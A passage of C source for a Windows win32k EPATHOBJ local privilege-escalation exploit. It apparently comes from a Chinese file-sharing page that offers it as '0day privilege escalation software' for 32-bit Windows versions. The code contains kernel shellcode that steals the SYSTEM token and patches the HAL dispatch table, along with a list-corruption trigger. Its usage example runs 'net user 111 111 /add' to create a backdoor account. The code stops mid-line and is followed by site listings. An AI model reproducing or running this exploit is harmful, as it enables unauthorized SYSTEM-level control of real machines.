#include <stdio.h>
#include <STDARG.H>
#include <stddef.h>
#include <windows.h>
//#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000
#pragma comment(linker, "/SECTION:.text,ERW")
//
// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
//
// Tavis Ormandy <taviso () cmpxchg8b com>, March 2013
//
POINT Points[MAX_POLYPOINTS];
BYTE PointTypes[MAX_POLYPOINTS];
HRGN Regions[MAX_REGIONS];
ULONG NumRegion = 0;
HANDLE Mutex;
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
VOID LogInit();
VOID LogRelase();
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
#define PD_RESETSTYLE 0x00000004
#define PD_CLOSEFIGURE 0x00000008
#define PD_BEZIERS 0x00000010
#define ENABLE_SWITCH_DESKTOP 1
typedef struct _POINTFIX
{
ULONG x;
ULONG y;
} POINTFIX, *PPOINTFIX;
// Approximated from reverse engineering.
typedef struct _PATHRECORD {
struct _PATHRECORD *next;
struct _PATHRECORD *prev;
ULONG flags;
ULONG count;
POINTFIX points[4];
} PATHRECORD, *PPATHRECORD;
PPATHRECORD PathRecord;
PATHRECORD ExploitRecord = {0};
PPATHRECORD ExploitRecordExit;
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section; // Not filled in
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
typedef ULONG ( __stdcall *NtFreeVirtualMemory_)( HANDLE, PVOID, PULONG, ULONG);
NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
NtFreeVirtualMemory_ NtFreeVirtualMemory;
ULONG PsInitialSystemProcess, PsReferencePrimaryToken,
PsGetThreadProcess, WriteToHalDispatchTable, FixAddress;
void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
mov esi,PsReferencePrimaryToken
FindTokenOffset:
lodsb
cmp al, 8Dh;
jnz FindTokenOffset
mov edi,[esi+1]
mov esi,PsInitialSystemProcess
mov esi,[esi]
push fs:[124h]
mov eax,PsGetThreadProcess
call eax
add esi, edi
push esi
add edi, eax
movsd
;add token ref count.
pop esi
mov esi, [esi]
and esi, 0xFFFFFFF8
lea eax, [esi-0x18]
mov DWORD PTR [eax], 0x016B00B5
;fix the haltable
mov eax, WriteToHalDispatchTable
mov ecx, FixAddress
mov [ecx], 0xC3
mov DWORD PTR [eax], ecx
popfd
popad
;set ret code for NtQueryIntervalProfile
mov eax, [esp+0xc]
mov DWORD PTR [eax+4], 1
mov DWORD PTR [eax+8], 0xC0000018
xor eax, eax
ret
}
}
DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
//
// This routine waits for a mutex object to timeout, then patches the
// compromised linked list to point to an exploit. We need to do this.
//
LogMessage(L_INFO, "Watchdog thread %d waiting on Mutex", GetCurrentThreadId());
if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
//
// It looks like the main thread is stuck in a call to FlattenPath(),
// because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
// up, and then patch the list to trigger our exploit.
//
while (NumRegion--)
DeleteObject(Regions[NumRegion]);
LogMessage(L_ERROR, "InterlockedExchange(0x%08x, 0x%08x);", &PathRecord->next, &ExploitRecord);
InterlockedExchange((PLONG)&PathRecord->next, (LONG)&ExploitRecord);
} else {
LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
}
return 0;
}
void wellcome()
{
printf("\t\tthe win32k.sys EPATHOBJ 0day exploit\n");
printf("*******************************************************************\n");
printf("***\texploit by:<progmboy> <programmeboy@gmail.com>\t\t***\n");
printf("***\t0day finder:<Tavis Ormandy> <taviso@cmpxchg8b.com>\t***\n");
printf("***\ttested system:xp/2003/win7/2008 (*32bit*)\t\t***\n");
printf("*******************************************************************\n");
}
void usage()
{
printf("\nusage:\n<app> <cmd> <parameter>\n");
printf("example:\napp.exe net \"user 111 111 /add\"");
}
BOOL
FindAFixAddress(
ULONG NtoskrnlBase)
{
FixAddress = NtoskrnlBase + FIELD_OFFSET(IMAGE_DOS_HEADER, e_res2);
LogMessage(L_INFO, "Get FixAddress --> 0x%08x", FixAddress);
return TRUE;
}
// 0x602464FF; /*jmp esp+0x60*/
// 0x51C3686A; /*push 0; ret*/
DWORD CheckMagicDword()
{
OSVERSIONINFOEX OSVer;
DWORD dwMagic = 0;
OSVer.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
if(GetVersionEx((OSVERSIONINFO *)&OSVer)){
switch(OSVer.dwMajorVersion){
case 5:
dwMagic = 0x602464FF;
break;
case 6:
dwMagic = 0x642464FF;
break;
default:
dwMagic = 0;
}
}
return dwMagic;
}
int main(int argc, char **argv)
{
HANDLE Thread;
HDC Device;
ULONG Size;
ULONG PointNum;
int nret = 0;
DWORD MAGIC_DWORD = CheckMagicDword();
ULONG AllocSize = 0x1000, status, NtoskrnlBase;
RTL_PROCESS_MODULES module;
HMODULE ntoskrnl = NULL;
DWORD dwFix;
ULONG Address = MAGIC_DWORD & 0xFFFFF000;
LONG ret;
BOOL bRet = FALSE;
#ifdef ENABLE_SWITCH_DESKTOP
HDESK hDesk;
#endif
HMODULE ntdll = GetModuleHandle( "ntdll.dll" );
wellcome();
if (argc < 2){
usage();
return -1;
}
if (!MAGIC_DWORD){
LogMessage(L_ERROR, "unsupported system version\n");
return -1;
}
LogInit();
NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation = (NtQuerySystemInformation_)GetProcAddress( ntdll ,"NtQuerySystemInformation" );
NtFreeVirtualMemory = (NtFreeVirtualMemory_)GetProcAddress( ntdll ,"NtFreeVirtualMemory" );
if ( !NtQueryIntervalProfile || !NtAllocateVirtualMemory ||
!NtQuerySystemInformation || !NtFreeVirtualMemory){
LogMessage(L_ERROR, "get function address error\n");
LogRelase();
return -1;
}
//
// try to allocate memory.
//
while (TRUE){
ret = NtAllocateVirtualMemory( (HANDLE)-1, &Address, 0, &AllocSize, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if(ret < 0){
MEMORY_BASIC_INFORMATION meminfo;
LogMessage(L_ERROR, "allocate memory error code 0x%08x", ret);
LogMessage(L_INFO, "try to free memory");
if(VirtualQuery((LPVOID)Address, &meminfo, sizeof(meminfo))){
LogMessage(L_INFO, "meminfo state %d %d\n", meminfo.State, meminfo.Protect);
}
ret = NtFreeVirtualMemory((HANDLE)-1, &Address, &AllocSize, MEM_RELEASE);
if (ret < 0){
LogMessage(L_ERROR, "free memory error code 0x%08x", ret);
LogRelase();
return -1;
}
}else{
break;
}
}
//
// get the kernel info
//
status = NtQuerySystemIn
0day 提权软件 支持2K/2K3/xp/win7 32 等
需积分: 9 15 浏览量
2014-05-04
15:02:15
上传
评论
收藏 18KB 7Z 举报
guokeyige
- 粉丝: 2
- 资源: 4
最新资源
- 论文(最终)_20240430235101.pdf
- 基于python编写的Keras深度学习框架开发,利用卷积神经网络CNN,快速识别图片并进行分类
- 最全空间计量实证方法(空间杜宾模型和检验以及结果解释文档).txt
- 5uonly.apk
- 蓝桥杯Python组的历年真题
- 2023-04-06-项目笔记 - 第一百十九阶段 - 4.4.2.117全局变量的作用域-117 -2024.04.30
- 2023-04-06-项目笔记 - 第一百十九阶段 - 4.4.2.117全局变量的作用域-117 -2024.04.30
- 前端开发技术实验报告:内含4四实验&实验报告
- Highlight Plus v20.0.1
- 林周瑜-论文.docx
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈